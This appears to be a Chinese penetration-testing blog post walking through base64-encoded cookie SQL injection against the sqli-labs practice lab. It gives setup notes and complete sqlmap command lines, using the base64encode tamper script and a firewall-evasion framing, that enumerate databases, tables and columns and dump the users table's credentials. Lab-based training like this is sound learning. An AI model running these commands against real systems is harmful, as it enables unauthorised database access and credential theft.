在职老D渗透日记day4:sql注入漏洞(base64注入)

4.11.过防火墙模块tamper:base64注入

搭sqli-labs靶场,步骤同pikachu和dvwa,修改/sql-connections/db-creds.inc中$dbpaa = 'root',php改为5.6,高版本php会报错,创建数据库,即成功。

sqlmap -u "http://192.168.10.103/Less-21/index.php" --dbms mysql  -v 1 --batch --cookie="uname=YWRtaW4%3D;PHPSESSID=0roc9e02hrro7nefi1jiuvukq5" --param-del=";"  --tamper "base64encode.py" --level 3
YWRtaW4%3D         admin=
--param-del=";"    指定Cookie 中多个参数的分隔符为分号;
--level 3          level2仅测试基础Cookie注入,level3增加了更复杂的测试payload
完整工作流程总结

枚举数据库--dbs→ 获得数据库名(如security

枚举表名-D 数据库名 --tables→ 获得表名(如users, emails

枚举字段-D 数据库名 -T 表名 --columns→ 获得字段名(如id, username, password

导出数据-D 数据库名 -T 表名 --dump→ 获取敏感数据(如账号密码)

sqlmap -u "http://192.168.10.103/sqli-labs/Less-21/index.php" --dbms mysql -v 1 -batch --cookie="uname=YWRtaW4%3D;PHPSESSID=0roc9e02hrro7nefi1jiuvukq5" --param-del=";" --tamper "base64encode.py" --level 3 --dbs

sqlmap -u "http://192.168.10.103/sqli-labs/Less-21/index.php" --dbms mysql -v 1 -batch --cookie="uname=YWRtaW4%3D;PHPSESSID=0roc9e02hrro7nefi1jiuvukq5" --param-del=";" --tamper "base64encode.py" --level 3 -D security --tables

sqlmap -u "http://192.168.10.103/sqli-labs/Less-21/index.php" --dbms mysql -v 1 -batch --cookie="uname=YWRtaW4%3D;PHPSESSID=0roc9e02hrro7nefi1jiuvukq5" --param-del=";" --tamper "base64encode.py" --level 3 -D security -T users --columns

sqlmap -u "http://192.168.10.103/sqli-labs/Less-21/index.php" --dbms mysql -v 1 -batch --cookie="uname=YWRtaW4%3D;PHPSESSID=0roc9e02hrro7nefi1jiuvukq5" --param-del=";" --tamper "base64encode.py" --level 3 -D security -T users --dump

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值